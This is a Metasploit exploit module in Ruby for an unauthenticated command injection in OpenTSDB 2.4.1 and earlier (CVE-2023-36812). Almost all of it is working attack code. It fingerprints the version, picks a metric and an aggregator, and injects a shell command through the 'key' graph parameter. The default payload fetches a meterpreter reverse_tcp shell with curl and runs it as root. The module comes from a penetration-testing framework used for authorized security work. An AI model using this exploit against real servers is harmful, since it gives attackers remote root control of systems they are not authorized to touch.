/
opentsdb_key_cmd_injection.rb
237 lines (203 loc) · 8.58 KB
/
opentsdb_key_cmd_injection.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'OpenTSDB 2.4.1 unauthenticated command injection',
'Description' => %q{
This module exploits an unauthenticated command injection
vulnerability in the key parameter in OpenTSDB through
2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve
unauthenticated remote code execution as the root user.
The module first attempts to obtain the OpenTSDB version via
the api. If the version is 2.4.1 or lower, the module
performs additional checks to obtain the configured metrics
and aggregators. It then randomly selects one metric and one
aggregator and uses those to instruct the target server to
plot a graph. As part of this request, the key parameter is
set to the payload, which will then be executed by the target
if the latter is vulnerable.
This module has been successfully tested against OpenTSDB
version 2.4.1.
},
'License' => MSF_LICENSE,
'Author' => [
'Gal Goldstein', # discovery
'Daniel Abeles', # discovery
'Erik Wynter' # @wyntererik - Metasploit
],
'References' => [
['URL', 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'], # security advisory
['CVE', '2023-36812'], # CVE linked in the official security advisory
['CVE', '2023-25826'] # CVE that seems to be a dupe of CVE-2023-36812 since it describes the same issue and references the PR that introduces the commits that are referenced in CVE-2023-36812
],
'Platform' => 'linux',
'Arch' => 'ARCH_CMD',
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
'RPORT' => 4242,
'SRVPORT' => 8080,
'FETCH_COMMAND' => 'CURL',
'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),
'FETCH_WRITABLE_DIR' => '/tmp',
'FETCH_SRVPORT' => 8081
},
'Targets' => [ [ 'Linux', {} ] ],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2023-07-01',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options [
OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
]
end
def check
# sanity check to see if the target is likely OpenTSDB
res1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
unless res1
return CheckCode::Unknown('Connection failed.')
end
unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
return CheckCode::Safe('Target is not an OpenTSDB application.')
end
# get the version via the api
res2 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api', 'version')
})
unless res2
return CheckCode::Unknown('Connection failed.')
end
unless res2.code == 200 && res2.body.include?('version')
return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
end
begin
parsed_res_body = JSON.parse(res2.body)
rescue JSON::ParserError
return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
end
unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')
return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
end
version = parsed_res_body['version']
begin
if Rex::Version.new(version) <= Rex::Version.new('2.4.1')
return CheckCode::Appears("The target is OpenTSDB version #{version}")
else
return CheckCode::Safe("The target is OpenTSDB version #{version}")
end
rescue ArgumentError => e
return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
end
end
def select_metric
# check if any metrics have been configured. if not, exploitation cannot work
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'suggest'),
'vars_get' => { 'type' => 'metrics' }
})
unless res
fail_with(Failure::Unknown, 'Connection failed.')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")
end
begin
metrics = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')
end
unless metrics.is_a?(Array)
fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')
end
if metrics.empty?
fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')
end
# select a random metric since any will do
@metric = metrics.sample
print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")
end
def select_aggregator
# check the configured aggregators and select one at random
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'aggregators')
})
unless res
fail_with(Failure::Unknown, 'Connection failed.')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")
end
begin
aggregators = JSON.parse(res.body)
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')
end
unless aggregators.is_a?(Array)
fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')
end
if aggregators.empty?
fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')
end
# select a random aggregator since any will do
@aggregator = aggregators.sample
print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")
end
def execute_command(cmd, _opts = {})
# we need to percent encode the entire command.
# however, the + character cannot be used and percent encoding does not help for it. so we need to change chmod +x with chmod 744
cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))
start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')
end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data
end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')
get_vars = {
'start' => start_value,
'end' => end_value,
'm' => "#{@aggregator}:#{@metric}",
'o' => 'axis+x1y2',
'ylabel' => Rex::Text.rand_text_alphanumeric(8..12),
'y2label' => Rex::Text.rand_text_alphanumeric(8..12),
'yrange' => '[0:]',
'y2range' => '[0:]',
'key' => "%3Bsystem%20%22#{cmd}%22%20%22",
'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",
'style' => 'linespoint'
}
exploit_uri = '?'
get_vars.each do |key, value|
exploit_uri += "#{key}=#{value}&"
end
exploit_uri += 'json'
# using a raw request because cgi was leading to encoding issues
send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)
}, 0) # we don't have to wait for a reply here
end
def exploit
select_metric
select_aggregator
print_status('Executing the payload')
execute_command(payload.encoded)
end
end